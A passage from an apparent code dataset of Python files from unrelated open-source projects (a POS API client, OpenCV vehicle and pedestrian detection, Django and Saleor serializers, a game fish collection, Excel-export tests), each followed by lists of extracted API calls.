os\n'), ((5598, 5637), 'os.environ.get', 'os.environ.get', (['"""STAGE_GCS_PATH"""', '(False)'], {}), "('STAGE_GCS_PATH', False)\n", (5612, 5637), False, 'import os\n'), ((5836, 5876), 'os.environ.get', 'os.environ.get', (['"""NUM_HOROVOD_RETRIES"""', '(1)'], {}), "('NUM_HOROVOD_RETRIES', 1)\n", (5850, 5876), False, 'import os\n'), ((1228, 1254), 'json.loads', 'json.loads', (['env_config_str'], {}), '(env_config_str)\n', (1238, 1254), False, 'import json\n'), ((1371, 1400), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (1394, 1400), False, 'import collections\n'), ((3318, 3344), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3342, 3344), False, 'import datetime\n'), ((3347, 3390), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'timeout_seconds'}), '(seconds=timeout_seconds)\n', (3365, 3390), False, 'import datetime\n'), ((3431, 3457), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3455, 3457), False, 'import datetime\n'), ((3771, 3784), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3781, 3784), False, 'import time\n'), ((6690, 6730), 'os.environ.get', 'os.environ.get', (['"""GCS_OUTPUT_PATH"""', '(False)'], {}), "('GCS_OUTPUT_PATH', False)\n", (6704, 6730), False, 'import os\n'), ((6884, 6903), 'sys.exit', 'sys.exit', (['exit_code'], {}), '(exit_code)\n', (6892, 6903), False, 'import sys\n'), ((3609, 3637), 'subprocess.call', 'subprocess.call', (['ssh_command'], {}), '(ssh_command)\n', (3624, 3637), False, 'import subprocess\n'), ((5087, 5104), 'os.makedirs', 'os.makedirs', (['dest'], {}), '(dest)\n', (5098, 5104), False, 'import os\n'), ((5675, 5707), 'os.environ.get', 'os.environ.get', (['"""STAGE_GCS_PATH"""'], {}), "('STAGE_GCS_PATH')\n", (5689, 
5707), False, 'import os\n'), ((5717, 5756), 'os.environ.get', 'os.environ.get', (['"""STAGING_DIR"""', '"""/input"""'], {}), "('STAGING_DIR', '/input')\n", (5731, 5756), False, 'import os\n'), ((6185, 6227), 'os.environ.get', 'os.environ.get', (['"""BENCHMARK_NETWORK"""', '(False)'], {}), "('BENCHMARK_NETWORK', False)\n", (6199, 6227), False, 'import os\n'), ((6009, 6060), 'os.environ.get', 'os.environ.get', (['"""TASK_STARTUP_TIMEOUT_SECONDS"""', '(600)'], {}), "('TASK_STARTUP_TIMEOUT_SECONDS', 600)\n", (6023, 6060), False, 'import os\n'), ((6772, 6811), 'os.environ.get', 'os.environ.get', (['"""OUTPUT_DIR"""', '"""/output"""'], {}), "('OUTPUT_DIR', '/output')\n", (6786, 6811), False, 'import os\n'), ((6836, 6869), 'os.environ.get', 'os.environ.get', (['"""GCS_OUTPUT_PATH"""'], {}), "('GCS_OUTPUT_PATH')\n", (6850, 6869), False, 'import os\n')] |
shabaraba/SmaregiPy | smaregipy/pos/customer_groups.py | 5447e5da1f21b38c0da1a759ee50b982de1522f7 | import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
        Updates the customer group section.
        Overrides the save method because this update is performed with a PUT request.
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| [((499, 528), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (504, 528), False, 'from pydantic import Field\n'), ((576, 605), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (581, 605), False, 'from pydantic import Field\n'), ((633, 662), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (638, 662), False, 'from pydantic import Field\n'), ((698, 727), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (703, 727), False, 'from pydantic import Field\n'), ((766, 795), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (771, 795), False, 'from pydantic import Field\n'), ((845, 874), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (850, 874), False, 'from pydantic import Field\n'), ((925, 954), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (930, 954), False, 'from pydantic import Field\n'), ((1422, 1451), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1427, 1451), False, 'from pydantic import Field\n'), ((1502, 1531), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1507, 1531), False, 'from pydantic import Field\n'), ((1581, 1610), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1586, 1610), False, 'from pydantic import Field\n'), ((1661, 1690), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1666, 1690), False, 'from pydantic import Field\n'), ((2048, 2111), 'smaregipy.utils.DictUtil.convert_key_to_snake', 'DictUtil.convert_key_to_snake', (['response[self.Response.KEY_DATA]'], {}), '(response[self.Response.KEY_DATA])\n', (2077, 2111), False, 'from smaregipy.utils import NoData, DictUtil\n')] |
JCab09/StickyDJ-Bot | StickyDJ-Bot/src/clients/client.py | feaf2229a6729be6ad022f9105da19192e3a91d3 | #!/usr/bin/env python3
"""
Base-Client Class
This is the parent-class of all client-classes and holds properties and functions they all depend on.
Author: Jason Cabezuela
"""
import src.util.debugger as Debugger
import src.util.configmaker as configmaker
class BaseClient(object):
"""Base-Client Class"""
def __init__(self, configpath, configtype, debugFlag = False):
self._Debug = Debugger.Debugger(debugFlag)
self._Debug.write("INIT BaseClient")
defaultPrompt = "-"
self._prompt = defaultPrompt
self._clientConfig = configmaker.getConfig(configpath, configtype)
self._Debug.write("INIT_END BaseClient")
@property
def prompt(self):
return self._prompt
    def get_client_configuration(self):
        """Base method for getting the client configuration"""
    def load_client_configuration(self):
        """Base method for loading the client configuration into memory"""
| [((401, 429), 'src.util.debugger.Debugger', 'Debugger.Debugger', (['debugFlag'], {}), '(debugFlag)\n', (418, 429), True, 'import src.util.debugger as Debugger\n'), ((571, 616), 'src.util.configmaker.getConfig', 'configmaker.getConfig', (['configpath', 'configtype'], {}), '(configpath, configtype)\n', (592, 616), True, 'import src.util.configmaker as configmaker\n')] |
S0L1DUS/cryptocoinmon | cryptomon/ascii.py | 37b210ca2f93f0b70f160ad903782408dee0f9e9 | # -*- coding: utf-8 -*-
import sys
from cryptomon.common import Colors
if sys.version_info >= (3, 0):
import io
else:
import StringIO as io
ascii_title = """
/$$$$$$ /$$ /$$ /$$
/$$__ $$ | $$ | $$$ /$$$
| $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$
| $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$
| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$
| $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$
| $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$
\______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/
/$$ | $$| $$
| $$$$$$/| $$
\______/ |__/
"""
def process_title(title):
buf = io.StringIO(title)
lines = buf.readlines()
lines = lines[1:-1]
colored_lines = []
colored_title = ""
for line in lines:
colored_lines.append(Colors.BLUE + line[:13] + Colors.YELLOW + line[14:])
for line in colored_lines:
colored_title += line
return colored_title + Colors.ENDLINE
| [((1247, 1265), 'StringIO.StringIO', 'io.StringIO', (['title'], {}), '(title)\n', (1258, 1265), True, 'import StringIO as io\n')] |
Ishita-2001/Car-And-Pedestrian-prediction | car & pedestrian_tracker.py | 6c4aeca84ae49d40ff6d27e51800c6f50db55070 | import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run forever untill car stop
while True:
(read_successful,frame)=video.read()
gr_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| [((18, 114), 'cv2.VideoCapture', 'cv2.VideoCapture', (['"""C:\\\\Users\\\\ISHITA\\\\Desktop\\\\ML project\\\\UEM_PROJECT_COM\\\\pedestrian.mp4"""'], {}), "(\n 'C:\\\\Users\\\\ISHITA\\\\Desktop\\\\ML project\\\\UEM_PROJECT_COM\\\\pedestrian.mp4')\n", (34, 114), False, 'import cv2\n'), ((374, 413), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['car_tracker_file'], {}), '(car_tracker_file)\n', (395, 413), False, 'import cv2\n'), ((433, 479), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['pedestrian_tracker_file'], {}), '(pedestrian_tracker_file)\n', (454, 479), False, 'import cv2\n'), ((584, 623), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (596, 623), False, 'import cv2\n'), ((1097, 1135), 'cv2.imshow', 'cv2.imshow', (['"""car n pedestrians"""', 'frame'], {}), "('car n pedestrians', frame)\n", (1107, 1135), False, 'import cv2\n'), ((1145, 1159), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1156, 1159), False, 'import cv2\n'), ((834, 902), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x + 1, y + 2)', '(x + w, y + h)', '(255, 0, 0)', '(2)'], {}), '(frame, (x + 1, y + 2), (x + w, y + h), (255, 0, 0), 2)\n', (847, 902), False, 'import cv2\n'), ((895, 955), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 0, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n', (908, 955), False, 'import cv2\n'), ((1028, 1090), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 255, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 255, 255), 2)\n', (1041, 1090), False, 'import cv2\n')] |
glosoftgroup/tenants | saleor/wing/api/serializers.py | a6b229ad1f6d567b7078f83425a532830b71e1bb | # site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
except:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| [((197, 262), 'rest_framework.serializers.HyperlinkedIdentityField', 'serializers.HyperlinkedIdentityField', ([], {'view_name': '"""wing:api-update"""'}), "(view_name='wing:api-update')\n", (233, 262), False, 'from rest_framework import serializers\n'), ((280, 345), 'rest_framework.serializers.HyperlinkedIdentityField', 'serializers.HyperlinkedIdentityField', ([], {'view_name': '"""wing:api-delete"""'}), "(view_name='wing:api-delete')\n", (316, 345), False, 'from rest_framework import serializers\n'), ((357, 392), 'rest_framework.serializers.SerializerMethodField', 'serializers.SerializerMethodField', ([], {}), '()\n', (390, 392), False, 'from rest_framework import serializers\n'), ((989, 996), 'saleor.wing.models.Wing', 'Table', ([], {}), '()\n', (994, 996), True, 'from saleor.wing.models import Wing as Table\n')] |
TheFamiliarScoot/open-toontown | toontown/fishing/FishCollection.py | 678313033174ea7d08e5c2823bd7b473701ff547 | from . import FishBase
from . import FishGlobals
class FishCollection:
def __init__(self):
self.fishList = []
def __len__(self):
return len(self.fishList)
def getFish(self):
return self.fishList
def makeFromNetLists(self, genusList, speciesList, weightList):
self.fishList = []
for genus, species, weight in zip(genusList, speciesList, weightList):
self.fishList.append(FishBase.FishBase(genus, species, weight))
def getNetLists(self):
genusList = []
speciesList = []
weightList = []
for fish in self.fishList:
genusList.append(fish.getGenus())
speciesList.append(fish.getSpecies())
weightList.append(fish.getWeight())
return [genusList, speciesList, weightList]
def hasFish(self, genus, species):
for fish in self.fishList:
if fish.getGenus() == genus and fish.getSpecies() == species:
return 1
return 0
def hasGenus(self, genus):
for fish in self.fishList:
if fish.getGenus() == genus:
return 1
return 0
def __collect(self, newFish, updateCollection):
for fish in self.fishList:
if fish.getGenus() == newFish.getGenus() and fish.getSpecies() == newFish.getSpecies():
if fish.getWeight() < newFish.getWeight():
if updateCollection:
fish.setWeight(newFish.getWeight())
return FishGlobals.COLLECT_NEW_RECORD
else:
return FishGlobals.COLLECT_NO_UPDATE
if updateCollection:
self.fishList.append(newFish)
return FishGlobals.COLLECT_NEW_ENTRY
def collectFish(self, newFish):
return self.__collect(newFish, updateCollection=1)
def getCollectResult(self, newFish):
return self.__collect(newFish, updateCollection=0)
def __str__(self):
numFish = len(self.fishList)
txt = 'Fish Collection (%s fish):' % numFish
for fish in self.fishList:
txt += '\n' + str(fish)
return txt
| [] |
M4gicT0/Distribute | lead/strategies/strategy_base.py | af903cdf6ae271f4b1152007ea4ba3928af57936 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
#
# Distributed under terms of the MIT license.
"""
Strategy base class
"""
from abc import ABCMeta, abstractmethod
from tinydb import TinyDB, Query
from node import Node
import json
class Strategy(object):
def __init__(self, this_controller, this_description=None):
self.description = this_description
self.controller = this_controller
self.ledger = TinyDB("ledger.json")
self.db = TinyDB("nodes.json")
self.nodes = []
@abstractmethod
def store_file(self, file_bytes, file_name):
pass
@abstractmethod
def retrieve_file(self, file_name, locations):
pass
@abstractmethod
def get_time(self):
pass
def getNodes(self):
self.nodes = []
for item in self.db:
node = Node(item['mac'],item['ip'],item['port'],item['units'])
self.nodes.append(node)
return self.nodes
def getNodesWithFile(self,filename):
macs = self.ledger.search(Query().file_name == filename)
self.nodes = []
for item in macs:
mac = item["location"]
dbnode = self.db.get(Query().mac == mac)
            if dbnode is None:
continue
node = Node(dbnode['mac'],dbnode['ip'],dbnode['port'],dbnode['units'])
self.nodes.append(node)
return self.nodes
def getFileSize(self, filename):
file = self.ledger.get(Query().file_name == filename)
return file['size']
| [((449, 470), 'tinydb.TinyDB', 'TinyDB', (['"""ledger.json"""'], {}), "('ledger.json')\n", (455, 470), False, 'from tinydb import TinyDB, Query\n'), ((489, 509), 'tinydb.TinyDB', 'TinyDB', (['"""nodes.json"""'], {}), "('nodes.json')\n", (495, 509), False, 'from tinydb import TinyDB, Query\n'), ((857, 915), 'node.Node', 'Node', (["item['mac']", "item['ip']", "item['port']", "item['units']"], {}), "(item['mac'], item['ip'], item['port'], item['units'])\n", (861, 915), False, 'from node import Node\n'), ((1296, 1362), 'node.Node', 'Node', (["dbnode['mac']", "dbnode['ip']", "dbnode['port']", "dbnode['units']"], {}), "(dbnode['mac'], dbnode['ip'], dbnode['port'], dbnode['units'])\n", (1300, 1362), False, 'from node import Node\n'), ((1051, 1058), 'tinydb.Query', 'Query', ([], {}), '()\n', (1056, 1058), False, 'from tinydb import TinyDB, Query\n'), ((1491, 1498), 'tinydb.Query', 'Query', ([], {}), '()\n', (1496, 1498), False, 'from tinydb import TinyDB, Query\n'), ((1200, 1207), 'tinydb.Query', 'Query', ([], {}), '()\n', (1205, 1207), False, 'from tinydb import TinyDB, Query\n')] |
mudit-chopra/Python | project_euler/problem_01/sol6.py | 5d186f16d1f6d497c95c28c0ced7134314f65168 | '''
Problem Statement:
If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3,5,6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below N.
'''
from __future__ import print_function
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
'''store multiples of 3 and 5 in a set and then add'''
n = int(raw_input().strip())
l = set()
x = 3
y = 5
while(x<n):
l.add(x)
x+=3
while(y<n):
l.add(y)
y+=5
print(sum(l))
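# Illustrative cross-check (not part of the original exercise): the same answer
# can be computed in O(1) with the arithmetic-series formula, adding the sums of
# the multiples of 3 and of 5 below n and subtracting the multiples of 15 that
# would otherwise be counted twice.
def sum_of_multiples(k, limit):
    count = (limit - 1) // k
    return k * count * (count + 1) // 2
print(sum_of_multiples(3, n) + sum_of_multiples(5, n) - sum_of_multiples(15, n))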
| [] |
laymonage/django-jsonfallback | jsonfallback/functions.py | 6e70edd2dbab7d74230e4af48d160ea8c6a663fb | import copy
from django.db import NotSupportedError
from django.db.models import Expression
from .fields import mysql_compile_json_path, postgres_compile_json_path, FallbackJSONField
class JSONExtract(Expression):
def __init__(self, expression, *path, output_field=FallbackJSONField(), **extra):
super().__init__(output_field=output_field)
self.path = path
self.source_expression = self._parse_expressions(expression)[0]
self.extra = extra
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.source_expression = c.source_expression.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_postgresql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
params = []
arg_sql, arg_params = compiler.compile(self.source_expression)
params.extend(arg_params)
json_path = postgres_compile_json_path(self.path)
params.append(json_path)
template = '{} #> %s'.format(arg_sql)
return template, params
def as_mysql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
params = []
arg_sql, arg_params = compiler.compile(self.source_expression)
params.extend(arg_params)
json_path = mysql_compile_json_path(self.path)
params.append(json_path)
template = 'JSON_EXTRACT({}, %s)'.format(arg_sql)
return template, params
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
raise NotSupportedError(
'Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment.'
)
def copy(self):
c = super().copy()
c.source_expression = copy.copy(self.source_expression)
c.extra = self.extra.copy()
return c
| [((1727, 1839), 'django.db.NotSupportedError', 'NotSupportedError', (['"""Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment."""'], {}), "(\n 'Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment.'\n )\n", (1744, 1839), False, 'from django.db import NotSupportedError\n'), ((1930, 1963), 'copy.copy', 'copy.copy', (['self.source_expression'], {}), '(self.source_expression)\n', (1939, 1963), False, 'import copy\n')] |
pmbaumgartner/excelify | excelify/tests.py | c0e29733efe407248810c3a8d3ec874f0cc0daca | import unittest
import tempfile
import pathlib
import datetime
import warnings
from IPython.testing.globalipapp import start_ipython, get_ipython
import pandas.util.testing as tm
from pandas.core.frame import DataFrame
from pandas.core.series import Series
from pandas import read_excel
import pytest
ip = get_ipython()
ip.magic('load_ext excelify')
class TestMagicExportImport(unittest.TestCase):
def setUp(self):
self.tempexcel = tempfile.NamedTemporaryFile(suffix='.xlsx')
def test_series(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_series = read_excel(excel_name, squeeze=True, dtype=series.dtype)
tm.assert_series_equal(series, loaded_series, check_names=False)
def test_dataframe(self):
df = DataFrame()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'df -f {filepath}'.format(filepath=excel_name))
loaded_df = read_excel(excel_name, dtype=df.dtypes)
tm.assert_frame_equal(df, loaded_df, check_names=False)
def test_sheet_name(self):
series = Series()
excel_name = self.tempexcel.name
sheetname = 'test_sheet_name'
ip.run_line_magic('excel', 'series -f {filepath} -s {sheetname}'.format(filepath=excel_name, sheetname=sheetname))
loaded_excel = read_excel(excel_name, sheet_name=None)
assert 'test_sheet_name' in loaded_excel
def test_all_pandas_objects(self):
df1 = DataFrame()
df2 = DataFrame()
series1 = Series()
series2 = Series()
pandas_objects = [(name, obj) for (name, obj) in locals().items()
if isinstance(obj, (DataFrame, Series))]
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
for (name, obj) in pandas_objects:
if isinstance(obj, Series):
loaded_data = read_excel(excel_name, sheet_name=name, squeeze=True, dtype=obj.dtype)
tm.assert_series_equal(obj, loaded_data, check_names=False)
elif isinstance(obj, DataFrame):
loaded_data = read_excel(excel_name, sheet_name=name, dtype=obj.dtypes)
tm.assert_frame_equal(obj, loaded_data, check_names=False)
def test_sheet_timestamp(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_excel = read_excel(excel_name, sheet_name=None)
sheet_names = list(loaded_excel.keys())
for sheet in sheet_names:
_, date_string = sheet.split('_')
saved_date = datetime.datetime.strptime(date_string, "%Y%m%d-%H%M%S")
load_to_read = datetime.datetime.now() - saved_date
# there is probably a better way to test this
assert load_to_read.seconds < 10
def test_all_long_name(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
locals().update({'a' * 33 : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_provided(self):
with warnings.catch_warnings(record=True) as w:
series = Series()
excel_name = self.tempexcel.name
longsheet = 'a' * 33
ip.run_line_magic('excel', 'series -f {filepath} -s {longsheet}'.format(filepath=excel_name, longsheet=longsheet))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_default(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
longsheet = 'a' * 33
locals().update({longsheet : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel', '{longsheet} -f {filepath}'.format(longsheet=longsheet, filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def tearDown(self):
self.tempexcel.close()
def test_filename():
series = Series()
ip.run_line_magic('excel', 'series')
excel_name = list(pathlib.Path().glob('series_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
def test_all_filename():
series = Series()
df = DataFrame()
ip.run_line_magic('excel_all', '')
excel_name = list(pathlib.Path().glob('all_data_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
@pytest.fixture
def no_extension_file():
file = tempfile.NamedTemporaryFile()
yield file
file.close()
def test_filepath_append(no_extension_file):
series = Series()
excel_name = no_extension_file.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_all_filepath_append(no_extension_file):
series = Series()
df = DataFrame()
excel_name = no_extension_file.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.Path(excel_name + '.xlsx')
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_no_object():
with pytest.raises(NameError):
ip.run_line_magic('excel', 'nonexistantobject')
def test_non_pandas_object():
integer = 3
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'integer')
string = 'string'
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'string')
def test_all_no_objects():
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
def test_all_too_many_objects():
# this seems like a bad idea...
for i in range(102):
locals().update({'series' + str(i) : Series()})
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
| [((310, 323), 'IPython.testing.globalipapp.get_ipython', 'get_ipython', ([], {}), '()\n', (321, 323), False, 'from IPython.testing.globalipapp import start_ipython, get_ipython\n'), ((4574, 4582), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (4580, 4582), False, 'from pandas.core.series import Series\n'), ((4781, 4789), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (4787, 4789), False, 'from pandas.core.series import Series\n'), ((4799, 4810), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (4808, 4810), False, 'from pandas.core.frame import DataFrame\n'), ((5024, 5053), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (5051, 5053), False, 'import tempfile\n'), ((5145, 5153), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (5151, 5153), False, 'from pandas.core.series import Series\n'), ((5301, 5339), 'pathlib.PurePath', 'pathlib.PurePath', (["(excel_name + '.xlsx')"], {}), "(excel_name + '.xlsx')\n", (5317, 5339), False, 'import pathlib\n'), ((5454, 5462), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (5460, 5462), False, 'from pandas.core.series import Series\n'), ((5472, 5483), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (5481, 5483), False, 'from pandas.core.frame import DataFrame\n'), ((5628, 5662), 'pathlib.Path', 'pathlib.Path', (["(excel_name + '.xlsx')"], {}), "(excel_name + '.xlsx')\n", (5640, 5662), False, 'import pathlib\n'), ((5687, 5725), 'pathlib.PurePath', 'pathlib.PurePath', (["(excel_name + '.xlsx')"], {}), "(excel_name + '.xlsx')\n", (5703, 5725), False, 'import pathlib\n'), ((450, 493), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".xlsx"""'}), "(suffix='.xlsx')\n", (477, 493), False, 'import tempfile\n'), ((539, 547), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (545, 547), False, 'from pandas.core.series import Series\n'), ((700, 756), 'pandas.read_excel', 'read_excel', (['excel_name'], {'squeeze': '(True)', 'dtype': 'series.dtype'}), '(excel_name, squeeze=True, dtype=series.dtype)\n', (710, 756), False, 'from pandas import read_excel\n'), ((765, 829), 'pandas.util.testing.assert_series_equal', 'tm.assert_series_equal', (['series', 'loaded_series'], {'check_names': '(False)'}), '(series, loaded_series, check_names=False)\n', (787, 829), True, 'import pandas.util.testing as tm\n'), ((874, 885), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (883, 885), False, 'from pandas.core.frame import DataFrame\n'), ((1030, 1069), 'pandas.read_excel', 'read_excel', (['excel_name'], {'dtype': 'df.dtypes'}), '(excel_name, dtype=df.dtypes)\n', (1040, 1069), False, 'from pandas import read_excel\n'), ((1078, 